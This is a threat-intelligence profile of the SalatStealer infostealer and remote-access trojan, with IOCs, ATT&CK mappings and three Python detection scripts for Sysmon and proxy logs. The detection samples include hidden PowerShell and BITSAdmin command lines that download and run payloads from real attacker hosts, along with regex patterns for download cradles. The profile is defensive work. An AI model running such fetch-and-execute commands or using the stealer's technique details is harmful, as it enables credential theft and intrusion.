SALATSTEALER
SalatStealer is a Go-based Windows malware family, often described as a malware-as-a-service (MaaS) stealer, that combines broad information-stealing functionality with full remote-access trojan capabilities. Multiple reports describe it as a PE32 executable, frequently UPX-packed or using fake UPX section names, with encrypted configuration data and runtime C2 resolution. It has been linked to the NyashTeam/WebRat operation, a Russian-speaking MaaS group active since at least 2022, which marketed the malware via nyash[.]team and Telegram channels and used infrastructure including salat[.]cn, salator[.]es, websalat[.]top, sa1at[.]ru, wrat[.]in, webrat[.]ru, and webrat[.]top. Backend infrastructure was observed on Beget LLC-hosted servers in Russia, including 85.198.98.75 and 217.26.28.234, and additional linked infrastructure included 85.117.234.216 and 157.22.174.200.
SalatStealer targets browser credentials, cookies, login databases, web data, local state files, authentication tokens, browser sessions, and cryptocurrency wallets. Reported targeting includes 28 to 30 Chromium-based browsers, six or more Gecko-based browsers, 24 to 28 cryptocurrency wallet applications (counts vary between reports), and 62 Chrome extension IDs associated with wallet extensions. Named targets include Chrome, Edge, Brave, Opera, Vivaldi, Yandex, Chromium, Firefox, Waterfox, SeaMonkey, Thunderbird, MetaMask, Phantom, Electrum, Coinbase, Binance Wallet, TonKeeper, MyTonWallet, AtomicWallet, Jaxx Liberty, TerraStation, Trust Wallet, Coinomi, and MyMonero. It also steals Telegram Desktop tdata, Discord tokens, Steam files such as config.vdf and SteamTokens.txt, clipboard contents including cryptocurrency addresses and tg:// URLs, screenshots, and keylogger output.
Beyond infostealing, SalatStealer includes extensive RAT functionality. Reported capabilities include arbitrary command execution, interactive reverse shell access, screen capture and streaming, desktop recording, webcam capture, microphone capture, hidden desktop interaction, keylogging, file download, process control, task scheduling, SOCKS5 or P2P proxying, persistence, and self-deletion. Persistence has been observed via a Registry Run key under SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and one campaign specifically used a Run value named WindowsUpdateService pointing to %TMP%\svchost.exe. The malware also includes privilege escalation and credential-access features such as LSASS targeting, token theft, privilege adjustment, COM elevation abuse, DuplicateUserTokenFromSessionID, getSystemToken, NtQuerySystemHandles, and process unlocking via the Restart Manager API. It has been reported to abuse IElevator, IElevatorBrave, and IElevatorEdge COM interfaces to bypass Chromium App-Bound Encryption and decrypt browser secrets.
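The Run-key persistence described above (a value named WindowsUpdateService pointing at %TMP%\svchost.exe) is straightforward to hunt in registry telemetry. The following is an added example, not code from the page or from any vendor report: it evaluates constructed Sysmon Event ID 13 (registry value set) records and flags Run/RunOnce values whose target lives in a temp or user-writable directory, or that borrow a system-binary name outside System32/SysWOW64. The Sysmon field names are real; the event contents are made up for the example.

```python
"""Hunt Registry Run-key persistence that points into a temp directory.

Added example, not code from the page or from any vendor report. The records
below are constructed Sysmon Event ID 13 (RegistryEvent, value set) entries
shaped after the campaign described above, where a Run value named
WindowsUpdateService pointed at %TMP%\\svchost.exe.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Run and RunOnce keys under HKLM or any HKU hive.
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Directories a legitimate autorun entry almost never points into.
TEMP_PATH_RE = re.compile(r"%TMP%|%TEMP%|\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|\\Users\\Public\\",
                          re.IGNORECASE)
# Binary names that belong in System32/SysWOW64; the same name elsewhere is masquerading (T1036).
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe", "smss.exe"}
SYSTEM_DIR_RE = re.compile(r"^[A-Z]:\\Windows\\(System32|SysWOW64)\\", re.IGNORECASE)


@dataclass
class Finding:
    setter: str          # process that wrote the value (Sysmon Image)
    value_name: str      # Run value name, e.g. WindowsUpdateService
    data: str            # value data as written
    reasons: List[str] = field(default_factory=list)


def first_executable(data: str) -> str:
    """Return the program path from Run-value data such as '"C:\\dir\\a.exe" /flag'."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(" ", 1)[0]


def evaluate(event: dict) -> Optional[Finding]:
    """Return a Finding when a Run-key write looks like temp-directory persistence."""
    target = event.get("TargetObject", "")
    if event.get("EventID") != 13 or not RUN_KEY_RE.search(target):
        return None
    data = event.get("Details", "")
    exe = first_executable(data)
    reasons = []
    if TEMP_PATH_RE.search(exe):
        reasons.append("autorun target lives in a temp or user-writable directory")
    if exe.rsplit("\\", 1)[-1].lower() in SYSTEM_BINARIES and not SYSTEM_DIR_RE.match(exe):
        reasons.append("system binary name outside System32/SysWOW64 (masquerading)")
    if not reasons:
        return None
    return Finding(event.get("Image", ""), target.rsplit("\\", 1)[-1], data, reasons)


def hunt(events) -> List[Finding]:
    return [f for f in (evaluate(e) for e in events) if f is not None]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Temp\yesamsevo.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdateService",
     "Details": r"%TMP%\svchost.exe"},
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveSetup.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"C:\Windows\System32\SecurityHealthSystray.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\BITS\Start",
     "Details": "DWORD (0x00000002)"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[!] {f.value_name} = {f.data} (written by {f.setter}): {'; '.join(f.reasons)}")
```

Only the first record is flagged, on both grounds; the OneDrive entry shows why the check keys on temp directories rather than on AppData as a whole, since many legitimate per-user autoruns live under AppData\Local.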
Its command-and-control design is intended to complicate detection and disruption. Reports state that SalatStealer encrypts its C2 domain in the binary and decrypts it at runtime, resolves infrastructure through DNS-over-HTTPS using Cloudflare, Google DNS, and 1.1.1.1 with fallback to the local resolver, and communicates over WebSocket on the /saat/ path over HTTPS with QUIC/HTTP3 support. A newer sample, yesamsevo.exe (SHA-256 8651bf3f8f38d547530e0dcdd89da904e14ee7bd87c05f5ff429038ba73013ef), added a previously undocumented mechanism to resolve its primary C2 through TON blockchain DNS using tonutils-go, with periodic re-resolution to support infrastructure rotation. Reported command strings include postOpen, /config, _gateway, shutdown, taskkill, and ConnectCache.
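The network behaviour described above gives a defender several things to look for at the proxy: sessions to the reported domains and backend IPs, WebSocket upgrades on the /saat/ path (and the /sa1at/ path seen in the CERT-UA URLs), and DNS-over-HTTPS lookups to the named public resolvers coming from something other than a browser. The following is an added example, not code from the page or from any vendor: it scans constructed JSON-lines proxy records. The log format, its field names and the User-Agent strings are assumptions; in particular, treating Go's default `Go-http-client` User-Agent as the tell for the malware's DoH traffic is a heuristic of this example, not something the reporting states.

```python
"""Flag SalatStealer-style C2 traffic in HTTP proxy logs.

Added example, not code from the page or from any vendor. It applies the network
observations above (WebSocket sessions on the /saat/ path, the /sa1at/ path seen in
CERT-UA URLs, the defanged operator domains and backend IPs, and C2 resolution via
DNS-over-HTTPS) to constructed JSON-lines proxy records. The log format, its field
names and the User-Agent strings are assumptions made for the example.
"""
import json
import re
from typing import Iterable, List, Tuple

# Indicators as written on the page (defanged). IPs are the reported backend hosts.
DEFANGED_DOMAINS = ["salat[.]cn", "salator[.]es", "salator[.]ru", "websalat[.]top",
                    "sa1at[.]ru", "wrat[.]in", "webrat[.]ru", "webrat[.]top"]
BACKEND_IPS = {"85.198.98.75", "217.26.28.234", "85.117.234.216", "157.22.174.200"}
C2_PATH_RE = re.compile(r"^/sa1?at/", re.IGNORECASE)   # matches /saat/ and /sa1at/
# Public DoH endpoints named in the reporting (Cloudflare, Google DNS, 1.1.1.1).
DOH_HOSTS = {"cloudflare-dns.com", "dns.google", "1.1.1.1", "one.one.one.one"}


def refang(indicator: str) -> str:
    """Turn 'hXXps://salat[.]cn/sa1at/' back into a form that matches live logs."""
    return indicator.replace("[.]", ".").replace("hXXp", "http")


KNOWN_HOSTS = {refang(d) for d in DEFANGED_DOMAINS} | BACKEND_IPS


def classify(rec: dict) -> List[str]:
    """Return the reasons a single proxy record looks like SalatStealer C2 activity."""
    host = rec.get("host", "").lower()
    uri = rec.get("uri", "")
    reasons = []
    if host in KNOWN_HOSTS or any(host.endswith("." + d) for d in KNOWN_HOSTS):
        reasons.append("destination is reported SalatStealer infrastructure")
    if C2_PATH_RE.match(uri):
        if rec.get("upgrade", "").lower() == "websocket":
            reasons.append("WebSocket session opened on the /saat/ C2 path")
        else:
            reasons.append("request to the /saat/ C2 path")
    # Browsers do DoH with their own User-Agent; a bare Go HTTP client querying a
    # public DoH resolver matches the runtime C2 resolution described above.
    # Using Go's default User-Agent as the tell is an assumption of this example.
    if host in DOH_HOSTS and uri.startswith("/dns-query") and \
            rec.get("user_agent", "").startswith("Go-http-client"):
        reasons.append("DNS-over-HTTPS lookup from a Go HTTP client")
    return reasons


def scan(lines: Iterable[str]) -> List[Tuple[str, str, str, List[str]]]:
    """Scan JSON-lines proxy records; return (src, host, uri, reasons) for each hit."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        reasons = classify(rec)
        if reasons:
            hits.append((rec.get("src", "?"), rec.get("host", ""), rec.get("uri", ""), reasons))
    return hits


# Constructed proxy log (not captured traffic). Records 1, 2 and 5 come from one host:
# a DoH lookup, then the WebSocket session, then a POST to the /sa1at/ path.
SAMPLE_LOG = """
{"src": "10.0.0.12", "host": "cloudflare-dns.com", "uri": "/dns-query?dns=AAABAAABAAAAAAAABXNhbGF0AmNuAAABAAE", "method": "GET", "user_agent": "Go-http-client/1.1", "upgrade": ""}
{"src": "10.0.0.12", "host": "salat.cn", "uri": "/saat/", "method": "GET", "user_agent": "Go-http-client/1.1", "upgrade": "websocket"}
{"src": "10.0.0.31", "host": "cloudflare-dns.com", "uri": "/dns-query", "method": "POST", "user_agent": "Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0", "upgrade": ""}
{"src": "10.0.0.45", "host": "chat.example.com", "uri": "/socket", "method": "GET", "user_agent": "Mozilla/5.0", "upgrade": "websocket"}
{"src": "10.0.0.12", "host": "217.26.28.234", "uri": "/sa1at/", "method": "POST", "user_agent": "Go-http-client/2.0", "upgrade": ""}
"""

if __name__ == "__main__":
    for src, host, uri, reasons in scan(SAMPLE_LOG.splitlines()):
        print(f"[!] {src} -> {host}{uri}: {'; '.join(reasons)}")
```

Three of the five records are flagged; the Firefox DoH request and the unrelated WebSocket chat session are not. The path check is the durable part of this logic, since the reporting shows the operators rotate domains and, in the newer sample, resolve them through TON DNS rather than through anything a blocklist would catch.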
Observed delivery vectors vary by campaign. SalatStealer has been delivered through ClickFix-style social engineering using a fake Google Meet lure, where attackers relied on user-assisted execution and abused PowerShell and BITSAdmin rather than software exploitation; associated indicators included online-meet.com, 185.213.240.179, SHA-256 a7962ffda8cc0277c013ffd4bd4328e31aea8206b8379a0b574e05a5e5152812, and SHA-256 8a132e7dd4876c87b5c425db32291bd54a2f3a477c78ceb4d29f297867a150fa. It was also delivered in phishing campaigns targeting Ukrainian-speaking organizations via ZIP archives containing malicious LNK files that launched hidden PowerShell and fetched second-stage scripts from 195.10.205[.]65. CERT-UA reported SalatStealer use in UAC-0252 campaigns impersonating Ukrainian authorities and government institutions, including delivery via GitHub-hosted payloads and exploitation of the WinRAR vulnerability CVE-2025-8088 alongside SHADOWSNIFF and DEAFTICK. Related indicators from CERT-UA include main.exe SHA-256 c149a236ddf07fb96de1a893b8d09cdfdd2c28abfc4c3c17bb3ebd8c3c7b5cef, main.deupx.exe SHA-256 a4f1a6f8f5a407ea0113253b557a6dc75c35398edf21bbc5322c47ac1fd0b689, and network paths such as hXXps://salat[.]cn/sa1at/ and hXXps://salator[.]ru/sa1at/.
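Both delivery paths described above rely on user-assisted execution of built-in Windows tooling rather than on an exploit, which makes process-creation telemetry the natural place to catch them. The following is an added example, not code from the page or from any vendor report: it evaluates constructed Sysmon Event ID 1 records for BITSAdmin used as a downloader, PowerShell launched with hidden-window or policy-bypass flags, a download cradle in the command line, hidden PowerShell spawned directly by Explorer (the LNK or pasted-command pattern), and contact with the delivery infrastructure named above. The command lines are constructed for the example and are not quoted from the reporting.

```python
"""Detect the PowerShell / BITSAdmin staging chain used to deliver SalatStealer.

Added example, not code from the page or from any vendor report. It runs over
constructed Sysmon Event ID 1 (process creation) records shaped after the two
delivery paths described above: a ClickFix lure in which the user runs a command
that abuses PowerShell and BITSAdmin, and a ZIP-delivered LNK that launches hidden
PowerShell to fetch a second stage from 195.10.205[.]65. The command lines are
constructed for the example, not quoted from the reporting.
"""
import re
from typing import Dict, List, Tuple

# Delivery infrastructure named in the reporting (refanged for matching).
DELIVERY_IOCS = {"online-meet.com", "185.213.240.179", "195.10.205.65"}

HIDDEN_PS_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b|-e(?:p|xecutionpolicy)?\s+bypass|-enc(?:odedcommand)?\b",
    re.IGNORECASE)
DOWNLOAD_CRADLE_RE = re.compile(
    r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|invoke-expression|\biex\b|start-bitstransfer",
    re.IGNORECASE)
URL_HOST_RE = re.compile(r"https?://([^/\s:\"']+)", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased file name of a Sysmon Image / ParentImage path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(event: Dict[str, str]) -> List[str]:
    """Return the reasons one process-creation event looks like SalatStealer staging."""
    image = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if image == "bitsadmin.exe" and "/transfer" in cmd.lower() and URL_HOST_RE.search(cmd):
        reasons.append("BITSAdmin used to download a payload (T1197)")
    if image in {"powershell.exe", "pwsh.exe"}:
        hidden = HIDDEN_PS_RE.search(cmd) is not None
        if hidden:
            reasons.append("PowerShell started with hidden-window / policy-bypass flags")
        if DOWNLOAD_CRADLE_RE.search(cmd):
            reasons.append("PowerShell download cradle in command line")
        if hidden and parent == "explorer.exe":
            reasons.append("hidden PowerShell spawned directly by Explorer (LNK or pasted ClickFix command)")
    contacted = {m.group(1).lower() for m in URL_HOST_RE.finditer(cmd)} & DELIVERY_IOCS
    if contacted:
        reasons.append("contacts reported delivery infrastructure: " + ", ".join(sorted(contacted)))
    return reasons


def triage(events) -> List[Tuple[str, List[str]]]:
    """Return (CommandLine, reasons) for every event that produced at least one reason."""
    out = []
    for e in events:
        reasons = analyze(e)
        if reasons:
            out.append((e.get("CommandLine", ""), reasons))
    return out


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /transfer upd /download /priority foreground http://online-meet.com/meet/Update.exe %TMP%\Update.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -w hidden -nop -ep bypass -c "iwr http://195.10.205.65/stage2.ps1 -OutFile $env:TMP\s2.ps1; . $env:TMP\s2.ps1"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bitsadmin /list /allusers /verbose"},
]

if __name__ == "__main__":
    for cmd, reasons in triage(SAMPLE_EVENTS):
        print(f"[!] {cmd}\n    {'; '.join(reasons)}")
```

The scheduled-task PowerShell and the BITSAdmin job listing are left alone, which is the point of checking flag combinations and parentage rather than the mere presence of powershell.exe or bitsadmin.exe; both binaries are common in healthy environments.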
SalatStealer also appeared repeatedly as a payload in the Amadey botnet campaign tagged fbf543, which multiple analyses assessed as a pay-per-install distribution service. In that campaign, Amadey distributed between 50 and 100 samples (counts vary between reports) across 24 malware families, including Vidar, LummaStealer, QuasarRAT, XWorm, SantaStealer, RustyStealer, and SalatStealer, using infrastructure such as sys32[.]cc, qpgroup[.]top, and labinstalls[.]info at 158.94.211.222. Additional reporting noted that large trojanized-software campaigns using WinUpdateHelper.dll also delivered SalatStealer in some infections, alongside coin miners and Mesh Agent.
High-confidence sample hashes reported for SalatStealer include 8651bf3f8f38d547530e0dcdd89da904e14ee7bd87c05f5ff429038ba73013ef, ec2e071a6241ac4d12452070c37ffde5bd01650c6d9a5503d768cb583fea6756, 30a50cc0f7b317c9734e6792e7e4ec174035d92031bdcc87a80ad8826adc60b2, c149a236ddf07fb96de1a893b8d09cdfdd2c28abfc4c3c17bb3ebd8c3c7b5cef, and a4f1a6f8f5a407ea0113253b557a6dc75c35398edf21bbc5322c47ac1fd0b689. Overall, the reporting consistently characterizes SalatStealer as a commodity but feature-rich infostealer/RAT used in financially motivated campaigns, with notable use against Ukrainian targets and infrastructure overlaps pointing to Russian-speaking criminal operators.
Vulnerabilities exploited
4 CVEs correlated with this family across public research and vendor advisories.
UAC-0252 Campaign (Jan-Feb 2026): SalatStealer was deployed alongside three other tools in a campaign targeting Ukraine, tracked as UAC-0252 ... Initial vector: CVE-2025-8088 (WinRAR path traversal) distributed via the PalachPro Telegram channel.
A fresh SalatStealer sample (yesamsevo.exe) ships with a previously undocumented capability: resolving its C2 server address via TON blockchain DNS using tonutils-go.
Distribution via Fake CVE PoCs (NyashTeam, Dec 2025 to present): NyashTeam has been distributing SalatStealer through 15+ fake CVE proof-of-concept repositories on GitHub, including github[.]com/RedFoxNxploits/CVE-2025-10294-Poc, github[.]com/FixingPhantom/CVE-2025-10294, github[.]com/DExplo1ted/CVE-2025-12596-Exploit, and github[.]com/h4xnz/CVE-2025-55234-POC.
Groups observed using it
2 distinct threat actors attributed by public researchers.
UAC-0252: EXE in archive (SalatStealer); the link is assessed as weak, with a different delivery entirely.
Techniques & procedures
39 distinct techniques documented for this family, organized by ATT&CK tactic. ATT&CK rows are given as technique (ID): implementation; the remaining lines are evidence snippets from the underlying reports.

Initial Access (1 technique)
Phishing: Spearphishing Link (T1566.002): cracked software download links.

Execution (4 techniques)
On execution: mutex check (checkDupe), UAC bypass (Elevate), persistence via registry Run key and Task Scheduler...
The threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer.
This campaign demonstrates how ClickFix-style social engineering continues to evolve through abuse of legitimate Windows tooling and user-assisted execution workflows.

Persistence (4 techniques)
Modify Registry (T1112): registry Run key persistence, Defender exclusion bypass.
Also cited here: the on-execution Run key / Task Scheduler snippet and the PowerShell/BITSAdmin staging snippet under Execution.

Privilege Escalation (6 techniques)
Process Injection (T1055): WriteProcessMemory, SetWindowsHookEx.
main.DuplicateUserTokenFromSessionID -- WTS token duplication; main.getSystemToken -- SYSTEM token acquisition.
main.Elevate -- UAC bypass ... Collection hits ... then privilege escalation through IElevator COM, token duplication, and LSASS handle enumeration.
Also cited here: the on-execution UAC bypass (Elevate) snippet under Execution.

Stealth (7 techniques)
Cited here: the PowerShell/BITSAdmin staging snippet under Execution, and the Process Injection (T1055) and token-duplication entries under Privilege Escalation.

Defense Impairment (1 technique)

Credential Access (8 techniques)
main.NtQuerySystemHandles -- handle enumeration (LSASS targeting); main.findLsassProcess -- LSASS process location.
main.runKeylogger -- start capture; main.keyPressCallback -- SetWindowsHookEx WH_KEYBOARD callback; main.windowChangeCallback -- active window change (context labeling).
Collection hits 34 browsers, 28 crypto wallets, Telegram/Discord/Steam tokens, keylogger with window context, screenshots, and clipboard.
The malware's extensive browser and cryptocurrency wallet targeting highlights the continued operational focus on credential theft, session hijacking, and digital asset compromise.
Credentials in Files (T1552.001): browser profile data, wallet files.
Firefox gets parallel treatment through NSS master key derivation with ASN.1 PBE parsing, 3DES and AES decryption paths, and proper PKCS5 unpadding.
Chromium-based browsers get the full treatment: DPAPI master key decryption, AES-GCM cookie/password decryption, and -- critically -- a GetAppBoundKey function that bypasses Chrome v127+'s App-Bound Encryption via the IElevator COM interface.

Discovery (5 techniques)
Process Discovery (T1057): PROCESSENTRY32 enumeration.
System Information Discovery (T1082): Win32_Processor, Win32_LogonSession, HWID.
Virtualization/Sandbox Evasion (T1497): VirtualBox/VMware registry key checks, ACPI enumeration.
The bc.exe filename observed in a second Triage submission suggests the binary is distributed under different names to affiliates. System language and location discovery TTPs in that submission indicate geo-targeting or geo-fencing behavior.

Collection (6 techniques)
Data from Local System (T1005): wallet files, Telegram tdata, Steam configs.
main.(*wsSess).ffdesktop -- real-time screen streaming via ffmpeg.
Microphone: ffwmic, getMics (ffmpeg).
Also cited here: the keylogger function list and the "Collection hits 34 browsers..." snippet under Credential Access.

Command and Control (7 techniques)
The transport layer uses gorilla/websocket over HTTPS with QUIC/HTTP3 support (via quic-go). The C2 path is /saat/ with a WebSocket session protocol (wsSess) for bidirectional command execution.
Every infected host becomes a SOCKS5 proxy node: main.(*socks5Conn).Serve -- SOCKS5 server ... main.p2pSocks -- P2P SOCKS relay.
The actual C2 connection uses WebSocket over TLS for command-and-control, and QUIC (HTTP/3) for bulk data exfiltration.
SalatStealer has been documented before ... The binary imports github.com/xssnick/tonutils-go v1.16.0 and implements two functions: main.tonResolve and main.tryTonResolve.
A tloop function implements a polling loop that periodically re-resolves via TON, meaning the operator can rotate infrastructure mid-campaign and all infected hosts will follow within one polling interval. This is Fast Flux DNS with the blockchain as the authoritative server.
Also cited here: the PowerShell/BITSAdmin staging snippet under Execution.

Exfiltration (1 technique)
Exfiltration compresses to sent.zip, ships over WSS and QUIC.
IOCs tracked for this family
39 indicators attributed across vendor reports, sandbox runs, and researcher write-ups: IPs, domains, and DNS infrastructure linked to this family; file hashes (MD5, SHA-1, SHA-256) from samples and reports; and other indicator types observed in public reporting.
Recent activity
14 sources tracked across advisories, community write-ups, and news. Source summaries:
An information-stealing malware delivered via a ClickFix-style social engineering campaign that abuses legitimate Windows tools such as PowerShell and BITSAdmin. It targets browser data and cryptocurrency wallets to enable credential theft, session hijacking, and digital asset compromise.
An infostealer deployed in the UAC-0252 campaign impersonating Ukrainian government institutions and exploiting a WinRAR vulnerability.
An infostealer delivered as a final payload in some infections of the campaign.
A Go-based stealer and full-featured RAT that steals browser credentials, cookies, crypto wallets, and Telegram/Discord/Steam tokens; captures screenshots, clipboard, webcam, microphone, and keystrokes; provides shell access and SOCKS5 proxying; and uses TON blockchain DNS with Cloudflare DoH fallback to resolve C2 before exfiltrating data over WebSocket and QUIC.